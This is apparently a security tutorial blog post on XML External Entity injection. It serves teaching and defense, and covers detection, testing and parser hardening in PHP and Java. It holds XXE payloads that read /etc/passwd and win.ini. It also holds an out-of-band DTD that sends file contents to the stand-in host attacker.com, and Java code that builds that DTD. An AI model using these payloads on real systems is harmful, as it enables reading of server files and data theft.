Fading Coder

A Practical Dive into XML External Entity Injection

XML documents rely on a structured format that includes a declaration, an optional DTD (Document Type Definition), and the main data elements. The DTD allows the definition of entities, which act as placeholders that can expand to predefined values. When an entity references an external resource via the SYSTEM keyword, the XML parser may fetch and insert that resource’s content during processing.

Consider a simple XML payload:

<?xml version="1.0"?>
<!DOCTYPE demo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<app>
  <user>&xxe;</user>
</app>

If the receiving application parses this XML without disabling external entity resolution, the parser will attempt to read the local file /etc/passwd and replace the &xxe; reference with its contents, which then might be reflected in the application’s response.
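The expansion described above can be reproduced locally. The following is a minimal sketch, not a definitive test harness: it assumes the JDK's built-in JAXP parser, explicitly switches external general entities on so the result does not depend on a particular JDK's defaults, and points the entity at a throwaway temp file instead of /etc/passwd. The class and method names (XxeExpansionDemo, readUser, payloadFor, demo) are hypothetical.

```java
import java.io.IOException;
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

final class XxeExpansionDemo {

    // Parses the XML with external general entities enabled and returns
    // the text of the first <user> element, or a note if parsing fails.
    static String readUser(String xml) {
        try {
            DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
            dbf.setFeature("http://xml.org/sax/features/external-general-entities", true);
            Document doc = dbf.newDocumentBuilder()
                              .parse(new InputSource(new StringReader(xml)));
            return doc.getElementsByTagName("user").item(0).getTextContent();
        } catch (Exception e) {
            return "parse failed: " + e.getMessage();
        }
    }

    // Rebuilds the article's payload with the entity pointing at systemId.
    static String payloadFor(String systemId) {
        return "<?xml version=\"1.0\"?>\n"
             + "<!DOCTYPE demo [\n"
             + "  <!ENTITY xxe SYSTEM \"" + systemId + "\">\n"
             + "]>\n"
             + "<app>\n  <user>&xxe;</user>\n</app>";
    }

    // Writes a temp file, parses a payload that references it, and returns
    // whatever ended up inside <user>.
    static String demo() {
        try {
            Path secret = Files.createTempFile("xxe-demo", ".txt");
            try {
                Files.write(secret, "local-secret".getBytes(StandardCharsets.UTF_8));
                return readUser(payloadFor(secret.toUri().toString()));
            } finally {
                Files.deleteIfExists(secret);
            }
        } catch (IOException e) {
            return "setup failed: " + e.getMessage();
        }
    }

    public static void main(String[] args) {
        System.out.println(demo());
    }
}
```

The point of the sketch is that nothing in the application code asks for a file read; the parser performs it while expanding &xxe;.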

This behavior follows from the XML specification itself: the flaw is not a programming error in the strict sense but a failure to restrict parser features. Modern libraries often ship safe defaults. For instance, libxml2 2.9.0 and later, the library behind PHP’s XML extensions, does not substitute external entities by default, so functions like simplexml_load_string are safe unless the caller opts back in (for example by passing LIBXML_NOENT). However, developers may inadvertently re-enable dangerous features or run older library versions.

Crafting Attacks with DTDs

Attackers can declare entities inside the DTD block of the XML payload (internal DTD) or reference an externally hosted DTD file:

<!DOCTYPE data [
  <!ENTITY % payload SYSTEM "http://attacker.com/evil.dtd">
  %payload;
]>

External DTDs enable out-of-band exfiltration when the application does not reflect parsed content in its response. The attacker hosts a malicious DTD that reads sensitive data into a parameter entity and then embeds that value in a request to the attacker’s server:

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; send SYSTEM 'http://attacker.com/?collect=%file;'>">
%eval;
%send;

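The target parser follows the chain: it reads the local file into %file, constructs a dynamic entity send that includes the file content in a URL, and finally triggers send, generating an HTTP request that leaks the data. The percent sign in the nested declaration is written as &#x25; because a literal % inside an entity value would be read as the start of a parameter-entity reference.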
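To make the escaping in that chain easier to see, here is a small sketch that assembles the same four-line DTD from two inputs. It is illustrative only: OobDtdSketch and build are hypothetical names, and the sketch performs no encoding of its arguments, so it assumes both are already safe to place inside the quoted literals.

```java
final class OobDtdSketch {

    // Returns the text of an external DTD that loads fileUri into %file,
    // declares %send with the file content appended to collectorUrl,
    // and then triggers both entities.
    static String build(String fileUri, String collectorUrl) {
        return "<!ENTITY % file SYSTEM \"" + fileUri + "\">\n"
             // &#x25; is the character reference for '%'. It keeps the inner
             // declaration inert until %eval; is expanded by the parser.
             + "<!ENTITY % eval \"<!ENTITY &#x25; send SYSTEM '"
             + collectorUrl + "%file;'>\">\n"
             + "%eval;\n"
             + "%send;\n";
    }

    public static void main(String[] args) {
        System.out.print(build("file:///etc/hostname", "http://attacker.com/?collect="));
    }
}
```

Running main prints the DTD shown above, which is what a lab server would serve as evil.dtd.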

Identifying XXE Entry Points

Applications that accept XML input—whether in raw XML format, SOAP web services, or even hidden inside JSON or YAML structures—may process the XML with a vulnerable parser. Indicators include:

  • SOAP endpoints with a Content-Type of text/xml, application/xml, or application/soap+xml.
  • Web services that accept user-defined XML payloads (e.g., REST APIs with an XML body).
  • Any endpoint where XML appears within another encoding, like a base64-encoded string inside JSON. A common scenario is converting JSON to XML on the server side.
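The last indicator, XML hidden inside another encoding, can be checked mechanically while reviewing captured traffic. The sketch below is a rough heuristic under stated assumptions: it treats a value as interesting if it Base64-decodes to text that starts like an XML document. EmbeddedXmlSniffer and its methods are hypothetical names, and the checks will miss XML in other encodings (URL-safe Base64, gzip, and so on).

```java
import java.nio.charset.StandardCharsets;
import java.util.Base64;

final class EmbeddedXmlSniffer {

    // Cheap structural check: an XML declaration, a DOCTYPE, or text that
    // both opens and closes with angle brackets.
    static boolean looksLikeXml(String text) {
        String t = text.trim();
        return t.startsWith("<?xml")
            || t.startsWith("<!DOCTYPE")
            || (t.startsWith("<") && t.endsWith(">"));
    }

    // True if the value is valid standard Base64 and decodes to XML-like text.
    static boolean looksLikeBase64Xml(String value) {
        try {
            byte[] raw = Base64.getDecoder().decode(value.trim());
            return looksLikeXml(new String(raw, StandardCharsets.UTF_8));
        } catch (IllegalArgumentException e) {
            return false; // not valid Base64, so nothing to inspect
        }
    }

    public static void main(String[] args) {
        String encoded = Base64.getEncoder().encodeToString(
            "<data><name>guest</name></data>".getBytes(StandardCharsets.UTF_8));
        System.out.println(encoded + " -> " + looksLikeBase64Xml(encoded));
    }
}
```

A hit from a check like this only says the field is worth testing; whether the server actually parses it is still something to confirm with a probe.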

Testing with a Practical Example

Assume a web application that echoes a name element:

<?xml version="1.0"?>
<data>
  <name>guest</name>
</data>

The server responds with "Hello, guest". To test for XXE, submit:

<?xml version="1.0"?>
<!DOCTYPE test [
  <!ENTITY probe SYSTEM "http://yourserver.test/check">
]>
<data>
  <name>&probe;</name>
</data>

If the server makes a request to your domain, the parser resolves external entities. Next, attempt a file read by pointing the entity at file:///C:/windows/win.ini (Windows) or file:///etc/passwd (Unix-like). If the file’s contents appear in the response, the vulnerability is confirmed.
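When many endpoints are being tested, deciding whether a response reflects one of those two files can be automated. The following sketch is only a heuristic: it looks for a root entry in passwd format and for strings that commonly appear in a stock win.ini. The markers are assumptions about typical file contents, not guarantees, and XxeResponseCheck is a hypothetical name.

```java
import java.util.regex.Pattern;

final class XxeResponseCheck {

    // A passwd entry for root: name, password field, then UID 0 and GID 0.
    // Not anchored to line start, because the file may follow "Hello, ".
    private static final Pattern PASSWD_ROOT =
        Pattern.compile("root:[^:\\n]*:0:0:");

    // Returns "passwd", "win.ini", or "none" for a response body.
    static String classify(String body) {
        if (PASSWD_ROOT.matcher(body).find()) {
            return "passwd";
        }
        if (body.contains("; for 16-bit app support") || body.contains("[fonts]")) {
            return "win.ini";
        }
        return "none";
    }

    public static void main(String[] args) {
        System.out.println(classify("Hello, root:x:0:0:root:/root:/bin/bash"));
        System.out.println(classify("Hello, guest"));
    }
}
```

A "none" result does not rule out XXE; it may simply mean the endpoint is blind and needs the out-of-band approach.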

For blind scenarios, employ an out-of-band technique with an external DTD as described above. Parameter entities are also worth trying when general entities are filtered or never reflected, because they are expanded inside the DTD itself, before the document body is processed.

Preventing XXE

The most reliable defense is to completely disable DTD processing and external entities in the XML parser. Configuration depends on the language and library. In PHP with DOMDocument, for example:

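$dom = new DOMDocument();
// Dangerous: LIBXML_NOENT substitutes entities and LIBXML_DTDLOAD loads the external DTD
// $dom->loadXML($xmlInput, LIBXML_NOENT | LIBXML_DTDLOAD);
// Safer: pass neither flag; LIBXML_NONET additionally blocks network access while parsing
$dom->loadXML($xmlInput, LIBXML_NONET);
// On PHP before 8.0 with an old libxml2, also call libxml_disable_entity_loader(true) first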

For Java’s DocumentBuilderFactory, set:

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
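As a quick way to confirm the settings take effect, the sketch below wraps the three features above in a factory method and checks that a document with a DOCTYPE is rejected while plain XML still parses. It assumes the JDK's built-in parser; HardenedParser and its methods are hypothetical names, and the two extra calls (setXIncludeAware, setExpandEntityReferences) are commonly recommended additions rather than part of the snippet above.

```java
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.InputSource;

final class HardenedParser {

    // Builds a factory that refuses DOCTYPE declarations outright and,
    // as a second layer, disables both kinds of external entities.
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf;
    }

    // True if the hardened parser accepts the document, false if it rejects it.
    static boolean accepts(String xml) {
        try {
            hardenedFactory().newDocumentBuilder()
                             .parse(new InputSource(new StringReader(xml)));
            return true;
        } catch (Exception e) {
            return false;
        }
    }

    public static void main(String[] args) {
        String attack = "<?xml version=\"1.0\"?>"
            + "<!DOCTYPE demo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>"
            + "<app><user>&xxe;</user></app>";
        System.out.println("plain XML accepted:   " + accepts("<data><name>guest</name></data>"));
        System.out.println("DOCTYPE XML accepted: " + accepts(attack));
    }
}
```

Because the DOCTYPE is refused before any entity is declared, the file named in the payload is never opened. The parser's default error handler may still print a fatal-error line to stderr when it rejects the document.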

Besides parser hardening, validate input against an XML schema (XSD) when the structure is known, and whitelist acceptable protocols. Avoid manual serialization/deserialization of XML where possible, and keep all XML libraries up to date.
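For applications that cannot drop DTDs entirely, protocol allowlisting can be expressed in Java through the JAXP access properties. This is a sketch under assumptions: it relies on the JDK's built-in parser honoring XMLConstants.ACCESS_EXTERNAL_DTD and ACCESS_EXTERNAL_SCHEMA, whose value is a comma-separated list of permitted protocols (an empty string permits none). ProtocolAllowlistDemo and entityResolves are hypothetical names, and external entities are enabled explicitly so that only the allowlist decides the outcome.

```java
import java.io.IOException;
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

final class ProtocolAllowlistDemo {

    // Parses a document whose entity points at a temp file, with external
    // access limited to allowedProtocols. Returns true only if the file
    // content actually reached the parsed document.
    static boolean entityResolves(String allowedProtocols) {
        Path target = null;
        try {
            target = Files.createTempFile("allowlist-demo", ".txt");
            Files.write(target, "marker".getBytes(StandardCharsets.UTF_8));
            String xml = "<!DOCTYPE d [<!ENTITY e SYSTEM \"" + target.toUri() + "\">]>"
                       + "<d>&e;</d>";

            DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
            dbf.setFeature("http://xml.org/sax/features/external-general-entities", true);
            dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, allowedProtocols);
            dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, allowedProtocols);

            Document doc = dbf.newDocumentBuilder()
                              .parse(new InputSource(new StringReader(xml)));
            return doc.getDocumentElement().getTextContent().contains("marker");
        } catch (Exception e) {
            return false; // blocked or failed: nothing was read
        } finally {
            if (target != null) {
                try { Files.deleteIfExists(target); } catch (IOException ignored) { }
            }
        }
    }

    public static void main(String[] args) {
        System.out.println("file allowed: " + entityResolves("file"));
        System.out.println("none allowed: " + entityResolves(""));
    }
}
```

In practice the allowlist would name only what the application genuinely needs, which for most services is nothing at all.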
